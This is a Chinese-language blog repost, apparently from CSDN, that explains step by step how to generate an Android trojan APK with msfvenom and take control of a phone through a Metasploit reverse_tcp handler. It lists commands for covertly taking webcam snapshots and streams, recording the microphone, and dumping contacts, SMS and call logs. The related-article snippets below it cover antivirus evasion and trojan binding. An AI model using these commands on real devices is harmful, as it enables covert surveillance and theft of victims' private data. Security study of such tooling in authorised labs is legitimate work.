kali metasploit 之生成木马入侵android

最新推荐文章于 2024-08-08 10:32:49 发布
最新推荐文章于 2024-08-08 10:32:49 发布
阅读量1.5k 收藏 26
点赞数 2
文章标签: 移动开发
原文链接:http://www.cnblogs.com/moying-wq/p/10924235.html
版权

1.打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件(生成apk木马程序)。

msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555  > /root/apk.apk   #生成apk木马,设置本机ip与自定义端口

然后启动msf:
msfconsole
1.use exploit/multi/handler //加载模块
2. set payload android/meterpreter/reverse_tcp //选择Payload
3.show options //查看参数设置

这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 172.23.0.209 //这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
3.exploit //开始执行漏洞 开始监听,等待手机上线

目标上线成功示例(当目标上线成功后,会回显出命令行):

2. 控制androiud的命令:

sysinfo  //查看手机信息

webcam_list  //列出网络摄像头

webcam_stream  //开启摄像头

webcam_snap  //从指定的摄像头获取快照

webcam_chat  //开始视频聊天

dump_contacts   //导出电话号码

dump_sms   //导出信息

record_mic [ˈrekərd]  /记录/  从默认麦克风录制音频为X秒

check_root  //检查设备是否有根

dump_calllog  //获取调用日志

dump_contacts  //获取联系人列表

dump_sms  //获取短信

?  //查看更多命令

 

转载于:https://www.cnblogs.com/moying-wq/p/10924235.html

weixin_30483013
关注
Kali环境使用Metasploit生成木马入侵安卓手机
zhaghailiangji的博客
02-27 2万+
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。环境准备:Kali2.0(msfVENOM、metasploit)安卓手机或安卓模拟器利用过程:先查看本地IP...
木马渗透安卓系统实验
polaris___的博客
05-30 4476
1.实验内容 Metasploit后门攻击实现远程控制Android手机 2.实验环境 设备 IP 子网掩码 Kali Linux(Hack) 222.20.78.6 255.255.248.0 Android(靶机) 10.11.6...
Metasploit生成Android木马远控自己的安卓设备
qq_59235193的博客
01-15 5386
我们先用frp工具来实现端口映射,利用处在内网的攻击机kali实现对处在外网
msfconsole生成安卓木马版本低
最新发布
mjy60的博客
08-08 411
打开AndroidManifest文件将 android:minSdkVersion="10"改为 android:minSdkVersion="16"android:targetSdkVersion="17" />改为 android:targetSdkVersion="23" />进入文件123中(我这里的名字是123)用vim打开AdnroidManifest.xml。在<application>标签上方添加标签上方添加。用apktool将文件反编译。
Metasploit -- 生成木马(msfvenom)
weixin_41489908的博客
03-03 1202
男孩子都是铁的,你不用考虑他们的感受,他们真的不累,真的,真的不累。。。 ---- 网易云热评 作用:生成木马文件 1、msfvenom 相关参数介绍 -p, --payload <payload> 指定需要使用的payload(攻击荷载) -l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all -n, --nopsled <length> 为payload预先指定一个N.
metasploit、msfvenom生成木马入侵电脑及手机
weixin_34205076的博客
06-11 1166
简介 msfvenom msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 查看所有--payload的模块 msfvenom -l payloads 文件后缀名-f的格式 msfvenom --he...
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 8271
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
Kali 2020:用Metasploit实验入侵自己的安卓手机
热门推荐
askos的博客
11-01 1万+
目标:使用Kali里的Metasploit远程控制自己的安卓手机 (先写个大体的流程,改天做成详细教程。仅限于对自己的手机做实验,请勿用于非法行为) 一:生产apk安卓应用 1,使用msfvenom生成一个预设定向连接kali主机的apk安卓应用。 msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.12 lport=4444 R > t.apk 2,使用zipzlign对apk进行对齐 zipalign -v 4 t.apk tz
Metasploit
m0_57379855的博客
03-30 3317
Metasploitmetasploit下载ubuntu安装msfubuntu下载Kali开启msfKali下载Kali添加root用户打开msfKali更新msfViper炫彩蛇Kali安装viperMetasploit目录结构Metasploit模块auxiliaryexploitspayloadspostencodersevasionnopsmsfvenom常用参数-l-p-f-e-a-o-b-n-s-i-c-x-k-v各平台生成payload命令WindowsMacAndroidPowershell
渗透测试-使用metasploit的evasion模块生成后门木马
保持微笑的博客
01-17 1800
1.evasion简介 evasion是metasploit自带的模块,使用此模块可以生成反杀毒软件的木马。 2.操作流程 打开kali系统的Metasploit软件。 如图,我们可以看到evasion中有7个模块 查看模块 search evasion 使用模块use evasion/windows/windows_defender_exe 查看需要配置的参数 show options 生成软件set FILENAME 666.exe 指定一个payloadset ...
Metasploit后门攻击android
2301_77778745的博客
04-26 428
之后攻击便完成了,这时候返回一个meterpreter可以执行各种命令,可以通过’?‘来进行辅助获得更多的帮助信息。接着在终端里输入/etc/init.d/apache2 start 启动apache服务。/var/www/html是生成木马的路径,也是kali 2.0的web服务器路径。注意要把LHOST 和LPORT 设置成刚才配置木马程序的IP和端口。确认无误后,便可以开始监听,使用。LHOST对应的是本机的ip地址。LPORT对于你要监听的端口。
msfvenom & msfconsole——msfvenom生成木马入侵WinServer2008及Android手机
Ho1aAs‘s Blog
07-29 6346
文章目录一、使用环境二、msfvenom编写Trojan木马Ⅰ、电脑端.exe格式Ⅱ、移动端.apk格式三、msfconsole控制感染对象Ⅰ、电脑端示例:`shell`获取Windows的CMDⅡ、移动端示例:`webcam_stream`获取Android摄像头实时画面完 免责声明:本文章仅供网络安全方面学习、交流使用,任何操作与作者无关 请遵守我国法律法规 一、使用环境 VMware V15.5.0 Kali-Linux-2020.2 msfconsole msfvenom Windows Se
MSF手机渗透实验
weixin_63204687的博客
10-22 4403
可真刑,太可拷了
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 9145
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
网安学习笔记 3 ---- 安卓木马软件的使用(简单版)
ymy13326056686的博客
09-10 268
2023.9.101、kali提权2、查看kali ip3、生成木马软件 ps:可在在muma.apk前加入路径以保存到其他地方4、将创建的木马软件安装在模拟器上。
msf生成免杀木马
qq_56426046的博客
09-08 5666
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
手机android.sys木马,使用kali生成木马入侵安卓手机
weixin_42353186的博客
05-29 6830
大家好,我是T0reAd今天给大家带来的是使用kali生成行动开始先查看kali的ip,我的是1.114然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk5555是设置的端口,可以自己更改显示这个说明已经生成成功了然后启动msf:msfconsol...
Metasploit 实现木马生成、捆绑及免杀
阿里云云栖号
10-08 5291
简介:在渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过Metasploit的msfvenom命令来生成木马、捆绑木马以及对木马进行免杀处理。木马文件风险高,想要免杀需要用shellter工具捆绑下,但是处理后木马文件还是能被360检测到拦截下来。 实验环境: Kali Linux 知识点: msfvenom 如何生.
Kali之安卓木马
李木一的博客
02-24 1万+
Kali linux初体验Kali linux的安卓木马一般只能在内网操作,要想在监控互联网的安卓手机,必须要使用内网穿透,工具有很多,我使用的是NATAPP。思路如下:实现内网穿透Metasploit木马操作一、实现内网穿透进入https://natapp.cn/,根据提示注册并创建免费隧道进入https://natapp.cn/#download下载linux的客户端命令行内启动natapp。...
kali metasploit 木马
08-30
对于Kali Linux和Metasploit的使用,我可以提供一些基本信息。Kali Linux是一种流行的渗透测试和网络安全评估操作系统,它内置了许多用于渗透测试和漏洞利用的工具。Metasploit是一个开源的渗透测试框架,它提供了一系列工具和资源,用于测试和利用计算机系统的漏洞。 如果你想了解如何在Kali Linux中使用Metasploit来创建和使用木马,我建议你参考一些相关的教程和指南。这些资源可以帮助你学习如何使用Metasploit来进行渗透测试,但请记住,合法和道德的用途是非常重要的。在未经授权的情况下使用Metasploit来攻击他人的计算机是违法行为,这是非常严重的。 所以,请确保你只在合法的环境中使用这些工具,并遵守适用的法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值